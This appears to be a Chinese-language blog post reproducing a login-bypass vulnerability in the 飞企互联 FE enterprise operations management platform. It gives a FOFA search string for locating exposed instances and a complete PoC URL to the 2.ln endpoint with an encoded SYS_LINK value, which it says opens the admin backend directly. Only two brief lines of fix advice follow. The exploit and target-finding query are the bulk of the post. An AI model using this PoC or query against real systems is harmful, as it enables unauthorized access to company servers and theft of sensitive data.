飞企互联-FE企业运营管理平台 登录绕过漏洞复现

0x01 产品简介

飞企互联-FE企业运营管理平台是一个基于云计算、智能化、大数据、物联网、移动互联网等技术支撑的云工作台。这个平台可以连接人、链接端、联通内外,支持企业B2B、C2B与O2O等核心需求,为不同行业客户的互联网+转型提供支持。

0x02 漏洞概述

飞企互联-FE企业运营管理平台 2.ln接口处存在登录绕过漏洞,未授权的攻击者可构造恶意的url访问页面,可直接进入后台管理页面,获取敏感信息,进一步利用可控制整个服务器。

0x03 复现环境

FOFA:app="飞企互联-FE企业运营管理平台"

0x04 漏洞复现

PoC

复制代码
http://your-ip/2.ln?SYS_LINK=77507068764957484a5067777862714f457a66574871642f4330574c76717868394a35496d37416c497951724f33446f51486375685a5a2b31684938472b7056

直接拼接url即可进入后台

0x05 修复建议

关闭或删除相关接口

升级至安全版本

相关推荐
yunlong32671 小时前
吊装助理三维结构有限元分析操作教程
安全·有限元·方案·安全分析·吊装·起重·结构计算
德迅云安全-小潘3 小时前
H5安全风险与防护策略:构建可信的移动互联网服务
web安全
PXM的算法星球4 小时前
并发安全的轮询下标设计:用取模消灭越界与状态依赖
安全
优选资源分享4 小时前
PDF Anti-Copy Pro v2.6.2.4:PDF 防拷贝工具
网络·安全·pdf
三块可乐两块冰4 小时前
【无标题】
安全
边际效应5 小时前
第十三章:Native层安全深度剖析
安全
边际效应5 小时前
第四章:Unidbg原理与环境搭建
安全
yintele5 小时前
类人机器人BMS的静电防护
网络·安全·机器人
●VON5 小时前
AI 保险机制:为智能时代的不确定性兜底
人工智能·学习·安全·制造·von
bleach-6 小时前
buuctf系列解题思路祥讲--[SUCTF 2019]CheckIn1--文件上传以及user.ini的应用
nginx·web安全·网络安全·php